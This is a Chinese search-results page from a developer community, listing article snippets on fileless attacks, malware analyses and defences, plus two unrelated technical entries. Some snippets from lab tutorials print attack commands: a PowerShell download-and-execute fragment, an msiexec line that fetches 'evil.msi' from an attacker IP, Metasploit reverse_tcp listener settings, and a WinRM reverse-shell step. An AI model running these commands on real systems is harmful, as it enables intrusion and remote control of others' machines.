- 综合排序
- 最热优先
- 最新优先
浅谈无文件攻击
浅谈无文件攻击简介与大多数恶意软件不同,“无文件”攻击并不会在目标计算机的硬盘中留下蛛丝马迹,而是直接将恶意代码写入内存或注册表中。由于没有病毒文件,传统基于文件扫描的防病毒软件很难侦测到它们的存在。 然而,“无文件”攻击的定义已经逐渐扩大化,那些需要依靠文件系统的某些功能来实现激活或驻留的恶意软件也已经包括在了“无文件”攻击的范畴中。无文件攻击属于高级持续性威胁(APT)的一种。 APT在无文件攻击之外,还包括0day漏洞利用、缓冲区溢出攻击、傀儡进程等基于内存的攻击,同时还包括内存webshell等攻击,这些攻击可以轻松绕过现有的安全防护体系,将恶意代码悄无声息地植入内存中。 利用注册表利用缓冲区漏洞的无文件攻击有一个弊端就是一旦进程或系统关闭,恶意攻击也就不复存在。 使用内存取证技术,分析内存中的恶意代码,提取攻击的特征和证据,追踪攻击的来源和目的。无文件攻击是一种隐蔽而危险的攻击方式,需要我们提高警惕,加强防护,及时应对。
89710编辑于 2024-03-21- 来自专栏网络安全攻防
无文件落地攻击
文章前言 所谓的"无文件落地攻击"是指恶意程序文件不直接落地到目标系统的磁盘空间中的一种攻击手法,常用于逃避传统的安全检测机制,本篇文章将就此进行简要介绍几种目前比较流行的无文件落地攻击手法。 Step 4:之后在目标主机中使用powershell执行以下命令,实现无文件落地攻击 powershell -nop -w hidden -c "IEX ((new-object net.webclient Step 4:在目标主机中执行以下命令实现无文件落地执行载荷 msiexec /q /i http://192.168.174.129:1234/evil.msi ? Step 4:成功反弹shell回来 ? 知识拓展 这里介绍一种在内网中常用的无文件落地攻击方法——WinRM无文件落地攻击!!! Windows Server 2012中通过WinRM实施无文件攻击,最终返回一个新的具备较高隐藏度的Windows Sever 2012的shell给我们的攻击主机,以供对内网进行深入拓展和利用 攻击步骤
2.4K40发布于 2021-07-21 - 来自专栏FreeBuf
浅析无文件攻击
写在前面的话 在信息安全领域中,“无文件攻击”属于一种影响力非常大的安全威胁。攻击者在利用这种技术实施攻击时,不会在目标主机的磁盘上写入任何的恶意文件,因此而得名“无文件攻击”。 接下来,我们一起分析一下无文件攻击所采用的攻击方法以及策略,我们会对无文件攻击所涉及到的特定技术进行介绍,并解释为什么这种攻击方式在大多数情况下不会被安全防御系统发现。 技术一:恶意文档 其实一开始,很多安全研究专家所称之为的“无文件攻击”实际上是会涉及到文档文件的。 3、 脚本可以更加方便攻击者将攻击逻辑分散到多个攻击步骤中实现,以躲避某些基于行为分析的安全检测机制。 4、 可以通过代码混淆来增加安全分析的难度,并绕过反病毒技术。 ? 虽然在现代网络攻击活动中,无文件攻击只是其中的一种攻击技术,但很多恶意软件一般都会引入一些“无文件攻击”技术来尝试躲避安全产品的检测。
1.1K30发布于 2018-12-28 - 来自专栏FreeBuf
「无文件」攻击方式渗透实验
前几天看了一个文章《全球上百家银行和金融机构感染了一种“无文件”恶意程序,几乎无法检测》,觉得powershell很是神奇,自己希望亲手实验一下,以最大程度还原“无文件”攻击方式。 这套环境里面的192.168.1.108是黑客的kali攻击机,192.168.1.212是黑客的windows攻击机 科普下nishang和PowerSploit 1、Nishang是基于PowerShell 的代理,浏览器可以用这个代理进入到内网,但是burp不能用socks4a的代理。 * 科普一下csrf的攻击:CSRF:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF,简单来说攻击者盗用了你的身份,以你的名义发送恶意请求 Execution & Process Injection 要是实现这个前提条件是: 1.你要有源码 2.源码必须是c++编写,c#编写的一律崩溃 3.编译的时候建议用vs2010+winxp编译 4.
2.7K90发布于 2018-02-23 - 来自专栏FreeBuf
CrowdStrike | 无文件攻击白皮书
由于CrowdStrike邮件推送了“无文件攻击白皮书”《谁需要恶意软件?对手如何使用无文件攻击来规避你的安全措施》(Who Needs Malware? 03 作案工具:真实世界的无文件恶意软件 从上面的案例中,我们已经了解了端到端的无文件攻击是如何发生的。在攻击过程中,对手还可以结合其他技术,使用无文件工具和方法。 4)无文件型勒索软件 甚至勒索软件攻击者,现在也在使用无文件技术,来实现他们的目标。在这类勒索软件中,恶意代码要么嵌入文档中以使用本机脚本语言(如宏),要么使用漏洞直接写入内存。 04 为何传统技术无法抵御无文件攻击 由于传统安全解决方案极难检测到无文件攻击,因此无文件攻击正在增加。让我们来看看,为什么当今市场上的一些端点保护技术,对这些无恶意软件入侵如此脆弱。 4)使用失陷指标(IOC)工具来防止无文件攻击也不是很有效。本质上,IOC类似于传统的AV签名,因为它们是攻击者留下的已知恶意制品。
4.2K41发布于 2020-11-06 - 来自专栏洛米唯熊
利用WinRM实现内网无文件攻击反弹shell
用Administrator账户登录攻击机器 前提知道被攻击方的用户登录账户密码 Windows操作系统中,默认是开启共享IPC$的 IP:192.168.124.30(server2016) IP :192.168.124.20(win7) IP:192.168.124.32(Kali) 0x02:攻击过程 ---- 一、快速在(server2016)运行winrm 命令:winrmquickconfig 成功 三、在(win7)中需要被远程访问的文件,开启文件共享。 ? 开启共享文件夹,并添加访问用户的权限,使其能够远程访问。 五、利用(server2016)的WinRM 实现内网无文件攻击反弹shell 1、在(server2016)中执行以下命令 winrm invoke create wmicimv2/win32_process
1.5K20发布于 2019-08-29 - 来自专栏黑白天安全团队
常见的windows下无文件落地攻击手法
什么是无文件攻击? 无文件下对抗传统杀毒软件(AV) 这里我们可以看看一下CrowdStrike中《无文件攻击白皮书》分析的”为何传统技术无法抵御无文件攻击“来快速理解一下无文件落地的意义: 由于传统安全解决方案极难检测到无文件攻击 ,因此无文件攻击正在增加。 4)使用失陷指标(IOC)工具来防止无文件攻击也不是很有效。本质上,IOC类似于传统的AV签名,因为它们是攻击者留下的已知恶意制品。 无文件落地攻击的常用手法 一般来说在windows的能执行脚本或命令的组件都可以用来利用进行无文件落地攻击。
7.5K21发布于 2021-03-16 无文件攻击不再隐形,Trellix NDR + Wise 揭示攻击路径并引导修复
无文件横向移动,隐藏于系统信任之中的威胁网络攻击者的战术不断演变,试图绕过安全供应商的防护。如今的攻击者不再依赖传统的恶意软件,而是以“无文件”方式,利用受信任的系统组件,在网络中横向移动。 这种无文件横向移动,用传统的、仅监控终端或文件的安全解决方案很难检测到。攻击者可能使用有效凭证、避免写入磁盘,并伪装成正常的管理行为,使其操作看起来毫无异常。 即使是无文件攻击,也会在网络中留下痕迹。Trellix NDR 可以检测到异常的流量模式、配置错误的服务、可疑的横向移动行为。 图4:枚举服务权限图5:检查服务配置SCShell 利用相同的ChangeServiceConfigAAPI,悄无声息地更改服务路径,将某个命令指定为新的可执行文件。 图11:执行恶意载荷并将攻击者添加到管理员组图 12 展示了一个使用 SCShell 实现无文件横向移动的示例。
24710编辑于 2025-10-22- 来自专栏FreeBuf
揭秘基于注册表隐藏的无文件攻击
*本文原创作者:ArkTeam 发展 一直以来,文件是恶意代码存在的最常见形式,安全软件也通常把磁盘上的文件作为重点检测对象。然而,一旦恶意代码以无文件形式存储在系统中,便难以对其追踪。 早在十几年前,红色代码、Slammer蠕虫就利用缓冲区溢出进行攻击,通过网络传播,完全存在于内存之中,而不以文件作为载体。 不过,这种基于内存的无文件(Fileless)攻击一旦进程或系统关闭,也就不复存在。 随后,多款恶意程序甚至APT组织使用这种无文件持久化攻击技术。 ? 攻击流程 ? 结束语 基于注册表的无文件攻击利用操作系统特性来达到数据隐藏的意图,并将恶意程序运行在合法进程之中,这种方式能让基于文件监测的查杀手段失效,为此安全厂商们也积极做出响应,然而随着技术的进一步发展,恶意代码的隐藏方式很可能并不只局限于
2.1K50发布于 2018-02-08 - 来自专栏公共互联网反网络钓鱼(APCN)
基于SVG文件的新型无文件攻击路径分析与防御体系构建研究
然而,其内嵌脚本与动态加载能力亦被攻击者利用,形成一种新型的“双用途”攻击载体。近期VirusTotal平台披露44个零检测恶意SVG样本,暴露了传统安全检测机制在图像类文件处理上的结构性盲区。 本文系统分析此类攻击的技术原理、传播路径与规避机制,指出其利用内联脚本、事件触发与资源外链实现无文件载荷投递的攻击范式。 关键词: SVG安全;无文件攻击;零检测样本;内容安全策略;攻击检测盲区;网络安全防御1. 引言在现代网络安全防御体系中,文件类型识别与恶意代码扫描是威胁检测的基础环节。 规避检测机制:文件扩展名为.svg,MIME类型为image/svg+xml,多数安全代理默认信任;内容为纯文本,无PE结构或典型恶意文件特征;脚本经混淆或延迟执行,静态扫描难以识别语义。 若攻击者通过第三方库注入恶意SVG片段,可能在CI/CD过程中被自动打包至生产环境,形成长期潜伏的“逻辑后门”。4.
39610编辑于 2025-10-30 - 来自专栏FreeBuf
SQL Server Transact-SQL 的无文件攻击姿势
背景概述 近日,深信服安全团队捕获到一起绕过杀毒软件的无文件攻击事件,被入侵的主机或服务器会被安装Mykings、Mirai、暗云等多种僵尸网络木马及挖矿程序,并且难以彻底清除。 顺手逛一下查杀到恶意exe文件的目录,发现两个dvr后缀的文件,打开一看果不其然,包含了用于下载恶意文件的命令: ? ? 再通过对象名称查询sys.assembly_files表,找到ExecCode对应的content内容,从“4D5A”来看,这应该就是我们要找的目标: ? 病毒文件分析 将十六进制数据拷贝出来转换为PE文件,是一个用C#编写的DLL文件,通过MyDownloadFile方法读取指定URL网页的内容: ? SQL Server使用强密码; 4.深信服为广大用户免费提供查杀工具,可下载如下工具,进行检测查杀。
1.3K10发布于 2019-05-21 - 来自专栏Khan安全团队
无文件PELoader
https://github.com/TheD1rkMtr/FilelessPELoader
65830编辑于 2023-02-23 - 来自专栏渗透云笔记
PDF文件攻击
调用meterpreter载荷,反向连接到攻击机 set payload windows/meterpreter/reverse_tcp 4. 设置监听IP地址(与之前设置木马文件的一致) set LHOST 10.1.0.109 4. 设置监听端口(与之前设置木马文件的一致,默认是4444) set LPORT 8888 ? 5. 而后在偏移0x10就是uniqueName的数据,uniqueName为28位,对齐后为4个字节; ? 但这类漏洞因为PDF沙箱的原因也有着很大的局限性,往往是需要配合系统的提权漏洞一起使用才能进行完整的攻击过程,所以投入的成本较高在这几年来出现的完整攻击样本较少。 所以平时要小心陌生的文件,在打开前要明确来源,或使用杀毒软件进行杀毒。尽量保证电脑的软件处于最新版本,这样才能最大程度较低被攻击的概率。
2.9K30发布于 2020-03-12 - 来自专栏Python和安全那些事
恶意代码分析:2.LNK文件伪装成证书传播RokRAT恶意软件(含无文件攻击)
这篇文章将翻译一篇LNK文件发起的恶意攻击,主要是LNK文件伪装成证书执行RokRAT恶意软件,并利用Powershell命令发起无文件攻击和执行相关行为。基础性技术文章,希望您喜欢! 受感染的文本编辑器notepad++ [译文] 恶意代码分析:2.LNK文件伪装成证书传播RokRAT恶意软件(含无文件攻击) 声明:本人坚决反对利用工具或渗透技术进行犯罪的行为,一切犯罪行为必将受到严惩 RokRAT恶意软件的简化操作过程如下所示,是一种比较常见的LNK攻击: 通过Email发起鱼叉式钓鱼攻击,包括恶意LNK文件(可执行Powershell) 整个LNK文件包含:正常PDF文件、viwer.dat 、search.dat、find.bat 发起RokRAT无文件攻击,利用云端API收集用户信息 更详细的描述如下: (1)当LNK文件被执行时,它会运行PowerShell命令来创建并执行一个合法的文档文件 接着,“search.dat”以无文件攻击的方式读取并执行“viewer.dat”文件。
91110编辑于 2024-05-17 - 来自专栏安全领域
关于新型的无文件网络攻击,你需要知道的5件事
这些攻击有着许多的名字,“无文件攻击”是最常见的一种方式,但也会用"非恶意软件攻击"和"伪装攻击"(适应性攻击)。 所以,这些攻击很快就成为了IT和信息安全专业人员的头号威胁。 为了更加清楚了解无文件攻击的构成和工作原理,下面是每个业务负责人应该知道的5件事: 1.无文件攻击利用的是网络端口安全上的一个基本漏洞。 由于攻击的各个组成部分不都是恶意的,因此安全解决方案需要能够观察它们在一起运行时候的行为,并且能够识别来自其他合法程序的一系列行为会在什么时候组合成危险攻击。 4.无文件攻击的规模正在增加。 5.预防无文件攻击。 虽然无文件技术极难检测,但可以采取一些措施来保护业务并降低风险。好的第一步是禁用组织未主动使用的管理工具,或者至少限制其权限和功能。 相关:每个在乎安全的企业家需要知道的4个重要的网络安全措施 由于不用扫描的文件,所以检测和阻止无文件攻击最终要依靠IT部门识别网端上的恶意活动和行为的能力 - 最好是在发生任何损坏之前。
70220发布于 2018-08-01 - 来自专栏卯金刀GG
高并发Java(4):无锁
在高并发Java(1):前言中已经提到了无锁的概念,由于在jdk源码中有大量的无锁应用,所以在这里介绍下无锁。 1 无锁类的原理详解 1.1 CAS CAS算法的过程是这样:它包含3个参数CAS(V,E,N)。V表示要更新的变量,E表示预期值,N表示新值。 Java当中提供了很多无锁类,下面来介绍下无锁类。 2 无所类的使用 我们已经知道,无锁比阻塞效率要高得多。我们来看看Java是如何实现这些无锁类的。 2.1. 1 shift = 31 - Integer.numberOfLeadingZeros(scale); 前导零的意思就是比如8位表示12,00001100,那么前导零就是1前面的0的个数,就是4。
70420发布于 2019-07-26 - 来自专栏前沿安全技术
针对Model X无钥匙系统的远程攻击
本研究是针对特斯拉 Model X 无钥匙系统的实用安全评估。所分析的无钥匙系统采用了由通用标准认证的安全元件实现的安全对称密钥和公钥密码原语。 这些示例表明,Model X遥控钥匙上的OAD服务缺陷可能允许攻击者覆盖固件并获得远程代码执行。Toolbox 软件可以用于更新遥控钥匙固件,因此它包含了最新固件二进制文件的备份。 从这个实验中可以清楚地看出,遥控钥匙没有验证提供的固件二进制文件的真实性。这种不安全的固件更新(或 OAD)实现允许攻击者覆盖 CC2541 SoC 执行的固件。 4.使用获得的解锁令牌解锁汽车。5.连接到诊断连接器并将遥控钥匙与汽车配对。6.攻击者现在有新钥匙可以用来解锁和启动汽车,就像原来的钥匙一样。 生成恶意固件映像后,更新了 CRC 和 SHA1 哈希以获得有效的固件二进制文件,该文件可以在攻击的第二步中与 OAD 一起使用。
1.4K31编辑于 2023-06-24 - 来自专栏FreeBuf
无文件加密挖矿软件GhostMiner
早在2017年,已经观察到他们如何应用无文件技术使检测和监测更加困难。 8月观察到一个名为ghostminer的无文件加密货币挖掘恶意软件,该软件利用无文件技术和windows管理工具(wmi)。 还观察到GhostMiner 变体修改了被Mykings、PowerGhost、PCASTLE和BuleHub等感染的主机文件。 除了上述功能外,命令脚本还有一个wmi_killer函数,该函数终止正在运行的进程,并删除与恶意软件系相关联的计划任务和服务,例如: 1.Mykings 2.PowerGhost 3.PCASTLE 4. 另一个命令脚本函数wmi_checkhosts能够修改受感染计算机的主机文件。 ? 同时,ccbot使用两个ip地址,即118.24.63.208和103.105.59.68作为c&c服务器。 然后ghostminer将追加2130字节的随机值,该文件将保存为C:\windows\temp\lsass.exe。 恶意软件随后将执行以下命令: ? IOCs ?
1.8K00发布于 2019-10-10 - 来自专栏卓越笔记
Linux scp 无密码复制文件
目的:本地服务器(local)复制文件到远程服务器(remote) 本地服务器:local 远程服务器:remote (192.168.1.254) 1. 在 local 上运行 ssh-keygen -t rsa 在 /root/.ssh 下生成 id_rsa 和 id_rsa.pub 两个文件 2. 在 local 上运行 ssh-keygen -t rsa 在 /root/.ssh 下生成 id_rsa 和 id_rsa.pub 两个文件 4. 使用 cat id_rsa.pub.L >> authorized_keys 把 local 的 公钥 写入到 authorized_keys 文件中 6. 然后在 local 上就可以无密码使用 scp 复制文件到 remote 了(scp <file> root@192.168.1.254:/home/downloads)
6.4K50编辑于 2023-02-18 - 来自专栏FreeBuf
Netwalker无文件勒索软件分析
攻击者正不断研究更复杂的方式逃避恶意软件检测,近期发现攻击者利用PowerShell编写Netwalker勒索软件,直接在内存中执行,没有将实际的勒索软件二进制文件存储到磁盘中。 最后删除副本,防止受害者使用副本恢复文件。 ? 无文件勒索软件分析 Netwalker使用6个随机字符作为扩展名重命名加密文件: ? 它通常会避免对关键文件,可执行文件,动态链接库,注册表或其他与系统相关的文件进行加密,防止系统完全失效。 总结与建议 攻击者现在正在向勒索软件中添加反射DLL注入,从而使攻击难以被安全分析人员分析追踪。勒索软件本身对组织就具有很大的危害,成为无文件攻击后,其风险再次加大。 以下是避免被勒索软件攻击的一些建议: 定期备份关键数据,减轻勒索软件攻击的影响; 安装来自操作系统和第三方供应商的最新软件补丁; 遵守良好的邮件和网站安全规范; 及时发现警告可疑的电子邮件和文件; 在端点上实施应用程序白名单
1.6K20发布于 2020-06-20
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号